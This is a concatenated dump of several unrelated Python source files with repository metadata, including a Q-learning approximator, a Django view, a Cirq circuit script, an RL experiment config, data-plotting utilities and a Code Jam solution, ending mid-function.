    One weight column per action.  When ``rms`` is a non-zero decay
    coefficient, weight updates are scaled RMSProp-style by a running
    mean of squared gradients (``self.mms``).  Python 2 code (``print``
    statements).  NOTE(review): indentation reconstructed from a
    whitespace-stripped source.
    """

    def __init__(self, actions, features, report=False, rms=False):
        # report: dump diagnostic values to stdout.
        self.report = report
        # Randon W
        #self.W = np.random.rand(len(features), len(actions))
        # Zeros W
        self.W = np.zeros((len(features), len(actions)))
        # rms: falsy disables RMSProp; otherwise it is the decay factor
        # used in __updateMms__.
        self.rms = rms
        if self.rms:
            # Running mean of squared gradients, one cell per weight.
            self.mms = np.ones((len(features), len(actions)))
        if self.report:
            print self.W.shape

    def __wNormalize__(self, wfn):  # Could be static
        # Scale so the largest-magnitude entry becomes +/-1 (guarding
        # against division by zero).  NOTE(review): not called from any
        # visible method — confirm it is still needed.
        fmax = np.abs(np.max(wfn))
        fmin = np.abs(np.min(wfn))
        m = np.maximum(fmax, fmin)
        if m == 0.0:
            m = 1.0
        koef = 1.0 / m
        wfn = wfn * koef
        return wfn

    def __updateMms__(self, derivative, act_code):
        # Exponential moving average of squared gradients; cells whose
        # gradient is exactly zero only decay (no (1-rms) contribution).
        self.mms[:, act_code] = (self.rms * self.mms[:, act_code] + (1.0 - self.rms) * (derivative ** 2)) * (derivative != 0) + self.rms * (derivative == 0)
        # Clip to avoid overflow/underflow in the later sqrt division.
        self.mms[:, act_code] = np.clip(self.mms[:, act_code], 1e-20, 1e+20)

    def __wDecay__(self, weights, decay=1e-5):
        """L2-style weight-decay term added to the gradient."""
        #wsum = np.sum(weights ** 2)
        #regularize = decay / 2 * wsum
        #wsum = np.sum(weights)
        regularize = decay * weights
        return regularize

    def oneStep(self, features):
        """Return (Q-values for every action, column-vector features)."""
        features = features.reshape(-1, 1)
        Q = np.sum(self.W * features, axis=0)
        return Q, features

    def twoStep(self, features, featuresold, act_code, gamma=0.9):
        """TD target: reward + gamma * max_a Q(next_state, a).

        NOTE(review): ``Rewards`` is not defined in this file — presumably
        imported via fSandFun's star import; confirm.
        """
        features = features.reshape(-1, 1)
        reward = Rewards.get(features, featuresold)
        Q = reward + gamma * np.max(np.sum(self.W * features, axis=0))  # Old np.sum(self.W[:, act_code] * features.T)
        if self.report:
            print "------------------------ Reward --->", reward
        return Q, features

    def wUpdate(self, Q1, Q2, F1, act_code, alpha=0.1):
        """Gradient step on the chosen action's weight column.

        Q1: per-action Q-values from oneStep; Q2: TD target from twoStep;
        F1: column-vector features of the state acted in.
        """
        print "Q2 Q1 F1.T", Q2, Q1[act_code], F1.T, F1.T.shape,
        regularize = self.__wDecay__(self.W[:, act_code])
        print "WD", regularize, regularize.shape
        # Negative TD-error times features, plus weight decay.
        derivative = -(Q2 - Q1[act_code]) * F1.T + regularize
        print "DER", derivative, derivative.shape
        if self.rms:
            self.__updateMms__(derivative, act_code)
            updater = derivative / np.sqrt(self.mms[:, act_code])
        else:
            updater = derivative
        self.W[:, act_code] = self.W[:, act_code] - alpha * updater
        # NOTE(review): this print reads self.mms even when rms is falsy,
        # in which case __init__ never created it -> AttributeError.
        print "MMS", self.mms[:, act_code]
        print "UPDATER", alpha * updater, updater.shape
        if self.report:
            print "------------------------ Sum(W) --->", np.sum(self.W)
# ---------------------------------------------------------------------#
|
[
"[email protected]"
] | |
3b7426c9a1fc2f829c0acca4d6fd0e9403929b17
|
7eba4f112761d625ff56b4c1270f18fc8534818b
|
/mysite/west/views.py
|
a014c3ed49cb3ea6424f1f8a898c3f52a2320ed3
|
[] |
no_license
|
KillerManK/my_project
|
eb1dd1589b6b8e22144f183014bd435d21d348e3
|
f6ac88e65586ba5a0fdd59f6187b4eb2da1e831a
|
refs/heads/master
| 2021-01-10T16:45:50.894096 | 2016-01-05T02:12:00 | 2016-01-05T02:12:00 | 48,828,178 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 129 |
py
|
# -*- coding: utf-8 -*-
from django.http import HttpResponse
def first_page(request):
    """Return a minimal HTML response for the "west" app landing page."""
    body = "<p>西餐</p>"
    return HttpResponse(body)
|
[
"[email protected]"
] | |
83d156ab9ebb07eab0942d0dca9e2aceddcd96cb
|
fbc1455b474e3e8ad6c16bcc9d44ed0dcfc480a7
|
/grading/usermanage/management/commands/oauth_setup.py
|
e92f80e7f6bf81fbe915fca8ce4e43848d342021
|
[] |
no_license
|
AlbanyCompSci/grading
|
c2c6affc2609c0e30d135a80f2f1aab5b750ab0e
|
2bf82ffb7f5ce416f166ad74ce4b16891221f1d5
|
refs/heads/master
| 2021-07-13T12:23:26.743195 | 2014-09-12T17:02:33 | 2014-09-12T17:02:33 | 19,794,798 | 0 | 0 | null | 2021-06-29T19:45:04 | 2014-05-14T20:20:21 |
CSS
|
UTF-8
|
Python
| false | false | 870 |
py
|
from django.core.management.base import NoArgsCommand
from django.contrib.sites.models import get_current_site
from allauth.socialaccount.models import SocialApp
import webbrowser
class Command(NoArgsCommand):
    """Interactive management command wiring up Google OAuth login.

    Opens the Google developer console in a browser, prompts the admin
    for the OAuth client id/secret and the site domain, and stores them
    as the django-allauth SocialApp with pk=1.  Python 2 code
    (``raw_input``).
    """
    help = 'Set up google login'

    def handle(self, **options):
        # Let the admin create/look up credentials in the Google console.
        webbrowser.open_new_tab('https://console.developers.google.com')
        # Reuse pk=1 so re-running the command updates in place.
        app, app_pre_exists = SocialApp.objects.get_or_create(id=1)
        app.provider = 'google'
        app.name = 'Grading'
        app.client_id = raw_input('Client ID: ')
        app.secret = raw_input('Secret Key: ')
        # Rebind the app to the current site under the entered domain.
        app.sites.clear()
        site = get_current_site(None)
        domain = raw_input('Domain: ')
        site.name = domain
        site.domain = domain
        site.save()
        app.sites.add(site)
        app.save()
        self.stdout.write('Successfully saved %r.' % app.name)
|
[
"[email protected]"
] | |
88be1a8dbca36a3704310ed5d08336575231773d
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/data/cirq_new/cirq_program/startCirq_pragma263.py
|
bc6b11402b4ca6da63e2f0bf7495b508300d9153
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,624 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=15
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
class Opty(cirq.PointOptimizer):
    """Circuit rewrite pass replacing every CZPowGate with CZ + X layers.

    NOTE(review): the two X.on_each layers cancel, so the net effect is
    substituting a plain CZ for the CZPowGate — presumably a gate-set
    normalisation; confirm intent.
    """

    def optimization_at(
            self,
            circuit: 'cirq.Circuit',
            index: int,
            op: 'cirq.Operation'
    ) -> Optional[cirq.PointOptimizationSummary]:
        # Only rewrite concrete gate operations whose gate is a CZPowGate;
        # everything else falls through (implicit None = leave unchanged).
        if (isinstance(op, cirq.ops.GateOperation) and isinstance(op.gate, cirq.CZPowGate)):
            return cirq.PointOptimizationSummary(
                clear_span=1,
                clear_qubits=op.qubits,
                new_operations=[
                    cirq.CZ(*op.qubits),
                    cirq.X.on_each(*op.qubits),
                    cirq.X.on_each(*op.qubits),
                ]
            )
#thatsNoCode
def make_circuit(n: int, input_qubit):
    """Build the fixed 4-qubit demo circuit (auto-generated gate list).

    ``n`` is unused by the body; the gate sequence below is hard-coded
    against ``input_qubit``.  Ends with a measurement of all qubits under
    key 'result'.  The ``# number=`` comments are generator bookkeeping.
    """
    c = cirq.Circuit()  # circuit begin

    c.append(cirq.H.on(input_qubit[0]))  # number=1
    c.append(cirq.H.on(input_qubit[1]))  # number=2
    c.append(cirq.H.on(input_qubit[1]))  # number=7
    c.append(cirq.H.on(input_qubit[2]))  # number=3
    c.append(cirq.H.on(input_qubit[3]))  # number=4
    c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0]))  # number=5
    c.append(cirq.H.on(input_qubit[0]))  # number=12
    c.append(cirq.CZ.on(input_qubit[3],input_qubit[0]))  # number=13
    c.append(cirq.H.on(input_qubit[0]))  # number=14
    c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0]))  # number=8
    c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0]))  # number=9
    c.append(cirq.SWAP.on(input_qubit[3],input_qubit[0]))  # number=10
    c.append(cirq.SWAP.on(input_qubit[3],input_qubit[0]))  # number=11
    # circuit end

    c.append(cirq.measure(*input_qubit, key='result'))

    return c
def bitstring(bits):
    """Collapse an iterable of bit-like values into their digit string."""
    return "".join(map(str, map(int, bits)))
if __name__ == '__main__':
    qubit_count = 4
    input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]

    # Build the demo circuit, then compile it for the Sycamore
    # sqrt-iswap gate set before sampling.
    circuit = make_circuit(qubit_count,input_qubits)
    circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')

    circuit_sample_count =2820

    simulator = cirq.Simulator()
    result = simulator.run(circuit, repetitions=circuit_sample_count)

    # Histogram of measured bitstrings, folded through bitstring().
    frequencies = result.histogram(key='result', fold_func=bitstring)

    # Dump histogram and compiled circuit for offline inspection.
    writefile = open("../data/startCirq_pragma263.csv","w+")
    print(format(frequencies),file=writefile)
    print("results end", file=writefile)

    print(circuit.__len__(), file=writefile)
    print(circuit,file=writefile)

    writefile.close()
|
[
"[email protected]"
] | |
951d40fc9470783bafcf2b1649073d604e0c09c7
|
567b912ef9e0075b44cd531499ed96e4e58d7638
|
/ini/experiment_binary_left_random.py
|
364b82f2a75ec3a6ca1b11e8c64ac6e29fcc9db6
|
[] |
no_license
|
atpcurr/atpcurr
|
3dbf9f49568c279a789ba0fc9478fa3fb28d83e8
|
0e1c9dcf408718097476d7aa599d557176ed3690
|
refs/heads/master
| 2022-09-17T21:44:52.637017 | 2022-09-07T00:52:08 | 2022-09-07T00:52:08 | 206,651,380 | 3 | 0 | null | 2020-09-25T22:21:44 | 2019-09-05T20:25:54 |
OpenEdge ABL
|
UTF-8
|
Python
| false | false | 3,308 |
py
|
import sys, os
from neptune_utils import simple_handle_experiment
from munch import Munch
# Experiment configuration for the "binary left random" run.  Field
# semantics come from the training framework (train_ppo.py) — values are
# passed through unchanged; only layout/comments were touched here.
base_config = Munch(actions_added=False,
                    actorbatch=512,
                    add_repeating_pretraining=False,
                    add_rnd_steps_to_remain=0,
                    backend="ocaml",
                    can_replace_proof=False,
                    curriculum_allowed=True,
                    curriculum_decay=0.6,
                    det_steps=True,
                    entcoeff=0.01,
                    episodes_per_problem=1000,
                    evaldirs=["theorems/robinson_binary/left_random/final"],
                    evalcount=100,
                    evaltime=60,
                    evaltype="prob",
                    failure_reward=0,
                    fast_features=False,
                    feature_file=None,
                    gamma=0.95,
                    graph_embedding=False,
                    graph_embedding_size=40,
                    graph_hidden_layers=[100,100],
                    graph_node_count=40,
                    graph_update_iteration=3,
                    illegal_reward=0,
                    known_proof_max_exploration=0,
                    latent_dim=None,
                    lr_schedule="constant",
                    max_exploration=60,
                    model_type="ppo1",
                    n_action_slots=22,
                    n_dim=500,
                    network_layers=[512,512,512],
                    optim_batchsize=64,
                    optim_epochs=4,
                    optim_stepsize=0.0001,
                    outdir="results/binary_left_random",
                    parallel_envs=1,
                    proof_dir="theorems/robinson_binary/proofs",
                    quick_progress_percentage=0.9,
                    saved_model=None,
                    scheduler_starting_step=1,
                    scheduler_type="local",
                    steps_per_curriculum=10000,
                    supervised_reward=0,
                    terminate_on_illegal=False,
                    train_timesteps=[500000],
                    train_dirs=["theorems/robinson_binary/binary_1m2p1m3__9"],
                    use_previous_state=True,
                    use_previous_action=True,
                    use_action_shuffle=False,
                    use_mcts=False,
                    use_remove=False,
                    use_replay=False,
                    use_shortest_proof=True,
                    value_gets_actions=False,
                    neptune=False,
                    tags=["binary"])

# No hyper-parameter sweep: launch this single configuration.
params_grid = dict()
def spec():
    """Entry point consumed by the experiment launcher.

    Packages this module's ``base_config``/``params_grid`` into an
    experiment specification for deepmath/curriculum-tp.
    NOTE(review): ``globals()["script"]`` must be injected into this
    module's globals by the launcher before spec() is called — confirm.
    """
    return simple_handle_experiment(experiment_name = 'binary_left_random',
                                    project_name = "deepmath/curriculum-tp",
                                    script='train_ppo.py',
                                    python_path='.:deps/awarelib',
                                    paths_to_dump = '',
                                    exclude = [".git", ".gitignore", ".gitmodules", "log"],
                                    project_tag = "test",
                                    base_config=base_config,
                                    params_grid=params_grid,
                                    _script_name=globals()["script"])
|
[
"[email protected]"
] | |
11b29102ee38f423a7a071ee75faa7c2f7cf7587
|
95e3f38e69bd79b0a338f04c3a4e53b9b7261eb1
|
/lista_4/exercicio_4.py
|
224c077dfe28f7fbc79feef853b76e11f242e4d7
|
[
"MIT"
] |
permissive
|
carlosjrbk/Logica-de-Programa--o---IFPE
|
87fb86caa88a3754c42501c69ac73c02edbf36ec
|
2201f56c5a5641dc33895c2e575983be51d87a86
|
refs/heads/main
| 2023-06-11T03:01:13.151354 | 2021-06-29T02:37:10 | 2021-06-29T02:37:10 | 379,378,279 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 183 |
py
|
# Exercise: Chico is 1.50 m and grows 2 cm/year; Zé is 1.10 m and grows
# 3 cm/year.  Count the years until Zé is at least as tall as Chico
# (capped at 100 iterations, exactly like the original loop).
height_chico = 1.50
height_ze = 1.10
years = 0
for _ in range(100):
    if height_chico > height_ze:
        height_chico += 0.02
        height_ze += 0.03
        years += 1
print('será necessario', years, 'anos')
|
[
"[email protected]"
] | |
67438a659a2296255acf174988b5cd4e41551121
|
b516490a2ecc9a0238b9e845f4384695e9e4ca83
|
/examples/rotating_square_grating.py
|
609fe6924ad00ca439c57b6ef0aed6c2de33965b
|
[
"MIT"
] |
permissive
|
ClandininLab/flystim
|
97717319a9f08a6bdad9cc4628f07ad10ea9894a
|
9d7af6215eb05f7eef75fe90581bc54f2e2f5aa9
|
refs/heads/master
| 2023-09-01T07:32:47.523874 | 2023-07-12T23:04:51 | 2023-07-12T23:04:51 | 131,910,815 | 2 | 4 |
MIT
| 2023-07-12T23:04:53 | 2018-05-02T22:08:09 |
Python
|
UTF-8
|
Python
| false | false | 915 |
py
|
#!/usr/bin/env python3
from flystim.stim_server import launch_stim_server
from flystim.screen import Screen, SubScreen
from flystim.trajectory import Trajectory
import numpy as np
from flystim.draw import draw_screens
from time import sleep
def main():
    """Show a rotating square-wave grating twice on a local stim server."""
    stim_duration = 2  # seconds of stimulus per trial
    iti = 2            # inter-trial interval, seconds

    screen = Screen(fullscreen=False, server_number=0, id=0, vsync=False)

    # draw_screens(screen)

    manager = launch_stim_server(screen)

    # Two identical trials: load, wait, run, stop, wait.
    for i in range(2):
        manager.load_stim(name='RotatingGrating', rate=60, hold_duration=1, period=60, mean=0.5, contrast=1.0, offset=0.0, profile='square',
                          color=[1, 1, 1, 1], cylinder_radius=1.1, cylinder_height=10, theta=0, phi=0, angle=0, hold=True)

        sleep(iti)
        manager.start_stim()
        sleep(stim_duration)
        manager.stop_stim(print_profile=True)
        sleep(iti)

if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
f736b231f33cffb070a9a4bb88108c52854ef72a
|
19a7959e21d430d6544aa6f8dd511902c83c6e91
|
/实验源代码/red_blue_game/dataProcessor.py
|
5a9519fc44e81658ea071adfa79f967c0f6a2d69
|
[] |
no_license
|
xioajiumi/red_blue_game
|
b6280b07e2fde7ee46180a962e4ad4cc7653d25d
|
ba6d876e8d0375af97010a324a499a5c35251fab
|
refs/heads/main
| 2023-08-31T20:29:57.475151 | 2021-10-20T12:28:10 | 2021-10-20T12:28:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,420 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Site :
# @File : dataProcessor.py
import json
import openpyxl as ox
import matplotlib.pyplot as plt
import numpy as np
import math
def store_2_json(file_name, path, datas):
    """Serialise *datas* as JSON into the file ``path + file_name``."""
    target = path + file_name
    with open(target, "w") as sink:
        json.dump(datas, sink)
def write_2_excel(file_name, path, datas, render=True):
    """Dump game results to an .xlsx workbook (sheets "datail"/"means").

    *datas* maps game number -> {"fin_score": (a_score, b_score),
    "rounds": {round_num: {"decisions": (a, b), "changed": (a, b)}}}.
    When *render* is true, also returns the list of per-game combined
    final scores so the caller can plot without re-reading the file;
    otherwise returns None.
    """
    file_name = path + file_name
    # Create a workbook with the two result sheets.
    wb = ox.Workbook()
    wb.create_sheet('datail')
    wb.create_sheet('means')
    # Detail rows go to "datail", per-game totals to "means".
    # NOTE(review): get_sheet_by_name() is deprecated in current openpyxl
    # (wb["datail"] is the modern spelling).
    ds = wb.get_sheet_by_name("datail")
    ms = wb.get_sheet_by_name("means")
    render_data = [] if render else None  # shortcut so rendering need not re-read the xlsx
    # Header cells for both sheets.
    ds.cell(1, 3).value = "最终得分"
    for i in range(1, 9):  # per-round column headers
        ds.cell(1, 2 + 2 * i).value = f"第{i}轮策略"
        ds.cell(1, 3 + 2 * i).value = f"第{i}轮损益"
    ms.cell(1, 1).value = "第N局"
    ms.cell(1, 2).value = "双方总分"
    # One two-row block (player A row, player B row) per game.
    for game_num, game_data in datas.items():
        ms.cell(1 + game_num, 1).value = f"第{game_num}局"  # game label
        ds.cell(2 * game_num, 1).value = f"第{game_num}局"  # game label
        ds.cell(2 * game_num, 2).value = f"玩家A"  # player A row label
        a_sco, b_sco = game_data["fin_score"][0], game_data["fin_score"][1]  # final scores of A and B
        ms.cell(1 + game_num, 2).value = (a_sco + b_sco)  # combined total for this game
        if render: render_data.append(a_sco + b_sco)  # collect data for rendering
        ds.cell(2 * game_num, 3).value = f"{a_sco}"  # player A total
        ds.cell(2 * game_num + 1, 2).value = f"玩家B"  # player B row label
        ds.cell(2 * game_num + 1, 3).value = f"{b_sco}"  # player B total
        for round_num, round_data in game_data["rounds"].items():
            a_dec, a_gain = round_data["decisions"][0], round_data["changed"][0]  # A's decision and payoff
            b_dec, b_gain = round_data["decisions"][1], round_data["changed"][1]  # B's decision and payoff
            # (commented-out alternatives kept out: rendering decisions as
            # 合作/背叛 text, or as 0/1, instead of raw False/True)
            ds.cell(2 * game_num, 2 + round_num * 2).value = f"{a_dec}"  # A's decision
            ds.cell(2 * game_num, 3 + round_num * 2).value = f"{a_gain}"  # A's payoff
            ds.cell(2 * game_num + 1, 2 + round_num * 2).value = f"{b_dec}"  # B's decision
            ds.cell(2 * game_num + 1, 3 + round_num * 2).value = f"{b_gain}"  # B's payoff
    wb.save(file_name)
    return render_data
def render(file_name, path, render_data):
    """Plot frequency and probability-density charts of per-game scores.

    *render_data* is the list of combined final scores produced by
    write_2_excel.  Shows a frequency histogram and a density plot with
    a fitted normal curve, and prints summary statistics.
    NOTE(review): *file_name* and *path* are unused here — confirm
    before removing; the /1000 divisors assume exactly 1000 games.
    """
    items = {}  # frequency of each distinct score
    for data in render_data: items[data] = items.get(data, 0) + 1.0  # score -> count pairs
    x_y = [(x, y) for (x, y) in items.items()]  # convert to a sortable list
    x_y.sort(key = lambda item: item[0])  # sort by score
    x, y_f, y_p = [], [], []
    for item in x_y:
        x.append(item[0])  # scores, ascending
        y_f.append(item[1])  # frequency of each score
        y_p.append(item[1] / 1000)  # relative frequency of each score
    # Frequency histogram
    plt.xlabel("Score")
    plt.ylabel("Frequency")
    plt.bar(x, y_f)  # per-game total score vs. count
    plt.plot(x, y_f)  # per-game total score vs. count
    plt.bar([_ / 2 for _ in x], y_f)  # per-player mean score vs. count
    plt.show()
    area=area_2_xaxis(x,y_f)
    print("area:",area)
    print(f"得分结果数量:{len(x)}")
    # Probability-density plot
    plt.xlabel("Score")
    plt.ylabel("Probability")
    mean = np.mean(render_data)  # mean total score
    var_f = np.var(render_data)  # variance of the raw scores
    pro = [x[i] * y_p[i] for i in range(len(x))]
    var_p = np.var(pro)  # variance of score * relative frequency
    print(f"频数方差:{var_f}")
    print(f"频率方差:{var_p}")
    # Normalise the frequency curve by its area so it integrates to ~1.
    plt.plot(x, [y/area for y in y_f], linewidth=2)
    # Try fitting a normal-distribution curve.
    mu, sigma_f,sigma_p = mean, math.sqrt(var_f),math.sqrt(var_p)
    print("sigma_p:",sigma_p)
    print("sigma_f:",sigma_f)
    print("count 0:",render_data.count(0.0))
    print("non-neg total score rate:",sum([1 for data in render_data if data >=0])/1000)
    for sig in [sigma_f,]:
        print(f"mu:{mean}\nsigma:{sigma_f}")
        draw_normal_dis(mean,sig)
    plt.show()
def area_2_xaxis(xs, ys):
    """Trapezoidal-rule area between the curve (xs, ys) and the x axis.

    *xs* holds the sample positions in order and *ys* the matching curve
    values.  Returns 0.0 when fewer than two samples are given — the
    original returned None in that case (the loop never reached its
    return), which would crash callers that divide by the result.
    """
    area = 0.0
    for i in range(len(xs) - 1):
        base = xs[i + 1] - xs[i]            # width of this trapezoid
        height = (ys[i] + ys[i + 1]) / 2    # mean of the two end values
        area += base * height
    return area
def draw_normal_dis(mu, sigma):
    """Overlay a normal pdf N(mu, sigma^2) on the current matplotlib axes."""
    xs = np.linspace(mu - 3 * sigma, mu + 3 * sigma, 50)
    pdf = np.exp(-((xs - mu) ** 2) / (2 * sigma ** 2)) / (math.sqrt(2 * math.pi) * sigma)
    plt.plot(xs, pdf, linewidth=2, color="coral")
|
[
"[email protected]"
] | |
d45b2df2ceb71ae350e9d6a317ee4e09741e503e
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_207/507.py
|
3881fca5b62b736452cde9286a5ba5618161c3b5
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,981 |
py
|
def validate(s):
    """Input-validation stub — never implemented (intentional no-op)."""
    pass
def solver(line):
    """Solve one case (looks like Code Jam 2017 "Stable Neigh-bors").

    ``line`` is [n, r, o, y, g, b, v]: total count and counts of the six
    colours.  Each secondary colour is paired off against its opposite
    primary (O with B, V with Y, G with R); the remaining primaries must
    form a ring with no equal neighbours.  Returns the arrangement string
    or "IMPOSSIBLE".  Python 2 code.  NOTE(review): indentation was
    reconstructed from a whitespace-stripped source — confirm nesting,
    especially the "bad stuff" guard.
    """
    n,r,o,y,g,b,v = line
    # Primary counts left after pairing each secondary with its opposite.
    t1 = b - o
    t2 = y - v
    t3 = r - g
    if t1 < 0 or t2 < 0 or t3 < 0:
        return "IMPOSSIBLE"
    if 0 in [t1,t2,t3]:
        # A primary is fully consumed: only a strict two-colour
        # alternation can work, needing exactly two equal non-zero counts.
        if line[1:].count(0) == 4:
            L = [(r,'R'),(o,'O'),(y,'Y'),(g,'G'),(b,'B'),(v,'V')]
            L.sort(key = lambda x: -x[0])
            if L[0][0] == L[1][0]:
                return (L[0][1] + L[1][1]) * L[0][0]
            else:
                return "IMPOSSIBLE"
        else:
            return "IMPOSSIBLE"
    L = [t1,t2,t3]
    # Ring condition: no colour may exceed the sum of the other two.
    if sum(L) < 2 * max(L):
        return "IMPOSSIBLE"
    else:
        L = [[t1,'B'],[t2,'Y'],[t3,'R']]
        s = '_'  # sentinel so s[-1] is defined on the first iteration
        # Greedily emit the most numerous remaining colour, saving the
        # last three stones for the wrap-around fix-up below.
        while sum(i[0] for i in L) > 3:
            #error: haven't enforced start != end
            L.sort(key = lambda x: -x[0])
            if L[0][1] != s[-1]:
                s += L[0][1]
                L[0][0] -= 1
            else:
                s += L[1][1]
                L[1][0] -= 1
                if L[1][0] < 0:
                    print "bad stuff"
        s = s[1:]  # drop the sentinel
        if s:
            t = s[0] + s[-1]
        else:
            t = 'RR'
        # Closing triple chosen so neither the seam with s's end nor the
        # wrap back to s's start repeats a colour.
        d = {'RR' : 'BRY',
             'RY' : 'BRY',
             'RB' : 'YRB',
             'YR' : 'BYR',
             'YY' : 'BYR',
             'YB' : 'RYB',
             'BR' : 'YBR',
             'BY' : 'RBY',
             'BB' : 'RBY'}
        s += d[t]
        # Re-insert each secondary run between two stones of its primary.
        s = s.replace('B','BO' * o + 'B', 1)
        s = s.replace('Y','YV' * v + 'Y', 1)
        s = s.replace('R','RG' * g + 'R', 1)
        return s
#case testing needs to happen
# Driver: read T cases from in.txt, write answers to out.txt.
# Python 2 code (print statement).
fout = open('out.txt','w')
f = open('in.txt')
T = int(f.readline())
for case in range(1,T+1):
    line = f.readline()
    line = line.split()
    line = [int(i) for i in line]
    ans = solver(line)
    str = "Case #%d: %s\n" % (case, ans)  # NOTE(review): shadows builtin str
    print str,
    fout.write(str)
f.close()
fout.close()
|
[
"[email protected]"
] | |
23dd9f6560ebd7e9a36a1242ce006af8f3c1d1db
|
8eb2306b6fdd1dfd687cc399af9a5ccdd5cfdeea
|
/make_snr.py
|
c811a13b201085633641ba8f80a3666e65197bbf
|
[] |
no_license
|
kangkulee/matplot-autoExcel-PPTX
|
12c3ab9bc5d7f56f89457f09142ceb3e1d6183be
|
9100e9882491c0ff90c8aa8860bd54b01bb604ad
|
refs/heads/master
| 2021-01-04T06:36:10.347447 | 2020-02-14T05:35:29 | 2020-02-14T05:35:29 | 240,432,964 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,281 |
py
|
from matplotlib import pyplot as plt, font_manager, rc
font_name = font_manager.FontProperties(fname="c:/Windows/Fonts/malgun.ttf").get_name()
rc('font', family=font_name)
import json
import openpyxl
import os
from pptx import Presentation
from pptx.util import Pt
from pptx.util import Inches
from datetime import date
import pptx
import boto3
# if __name__ == '__main__':
def make_snr():
    """Build per-station SNR histograms from a JSON-lines dump.

    Reads createCSV/<date>test.csv, groups SNR samples by station, saves
    one histogram PNG per station, appends slides to an existing .pptx
    and writes the bin counts into a new sheet of an existing .xlsx.
    NOTE(review): indentation reconstructed from a whitespace-stripped
    source — confirm the placement of prs.save() and the post-loop
    Excel writes.
    """
    #
    datenow = str(date.today())[2:4] + str(date.today())[5:7] + str(date.today())[8:10]
    name = 'tester'
    filename = 'createCSV/' + datenow + 'test.csv'
    excelname = 'Excel/' + datenow + 'test' + name + '.xlsx'
    picturename = 'chartPicture/avgSnrChart_'
    pptname = 'ppt/' + datenow + 'test' + name + '.pptx'
    titletext = 'title'
    f = open(filename, 'r')
    station_key = dict()
    station_col = 2  # first column for per-station headers in the sheet
    xbar_row = 2     # first row for the x-axis (bin edge) values
    cnt_col = 2      # first column for the bin counts
    cnt_row = 2      # first row for the bin counts
    count = []       # histogram counts collected per station
    #
    # load pptx
    prs = Presentation(pptname)
    title_slide_layout = prs.slide_layouts[0]
    slide = prs.slides.add_slide(title_slide_layout)
    title = slide.shapes.title
    subtitle = slide.placeholders[1]
    title.text = "title"
    subtitle.text = titletext
    slide_layout = prs.slide_layouts[1]
    slide = prs.slides.add_slide(slide_layout)
    slide_title_shape = slide.shapes.title
    slide_title_shape.text = "STATION LIST("+titletext+")"
    slide_body_shape = slide.placeholders[1]  # text box object
    slide_body_tf = slide_body_shape.text_frame
    # load excel
    write_wb = openpyxl.load_workbook(excelname)
    write_ws = write_wb.create_sheet('third')
    # Group SNR samples by station, skipping 'null' readings.  Lines use
    # single quotes, so they are fixed up before json.loads.
    for line in f:
        rawdata = json.loads(line.replace("'", "\""))
        if rawdata['payload']['station'] in station_key:
            if rawdata['payload']['snr'] != 'null':
                station_key[rawdata['payload']['station']].append(float(rawdata['payload']['snr']))
        else:
            if rawdata['payload']['snr'] != 'null':
                station_key[rawdata['payload']['station']] = [float(rawdata['payload']['snr'])]
    write_ws.cell(row=1, column=1, value='x축범위')
    # One histogram chart + pptx slide + excel column per station.
    for items in station_key.items():
        avg = round(sum(items[1]) / len(items[1]), 2)
        ys, xs, patches = plt.hist(items[1], range=(0, 40), color='r', edgecolor='black', linewidth=1.2, rwidth=0.8, bins=40, alpha=0.4)
        count.append(ys)
        write_ws.cell(row=1, column=station_col, value='snr(station : ' + items[0] + ')')
        station_col = station_col + 1
        plt.xlabel('snr')
        plt.ylabel('개수')
        plt.title('snr 차트\n(station : ' + items[0] + ') 평균 : ' + str(avg))
        plt.grid()
        plt.axvline(avg, linestyle='--')
        plt.minorticks_on()
        check_picture = os.path.exists(picturename + items[0] + '.png')
        if check_picture == True:
            # delete picture
            os.unlink(picturename + items[0] + '.png')
            # save picture
            plt.savefig(picturename + items[0] + '.png', dpi=500)
        else:
            # save picture
            plt.savefig(picturename + items[0] + '.png', dpi=500)
        # show chart
        # plt.show()
        plt.clf()  # initialize the figure for the next station
        # save pptx: list the station on the index slide, then add a
        # full-page slide holding the saved chart image.
        slide_p = slide_body_tf.add_paragraph()
        slide_p.text = items[0]
        slide_p.font.size = Pt(17)
        slide_layout = prs.slide_layouts[6]
        slide = prs.slides.add_slide(slide_layout)
        slide.shapes.add_picture(picturename + items[0] + '.png', Inches(0.5), Inches(0.5), width=Inches(9), height=Inches(6))
    prs.save(pptname)
    # insert excel
    # x-axis (bin edge) values in column 1; xs comes from the last hist
    # call (all stations share range=(0, 40), bins=40).
    for i in range(0,len(xs)-1):
        write_ws.cell(row=xbar_row, column=1, value=xs[i])
        xbar_row = xbar_row + 1
    # Bin counts, one column per station (40 rows, then wrap to next column).
    for i in range(len(count)):
        for j in range(len(count[i])):
            write_ws.cell(row=cnt_row, column=cnt_col, value=int(count[i][j]))
            cnt_row = cnt_row + 1
            if cnt_row == 42:
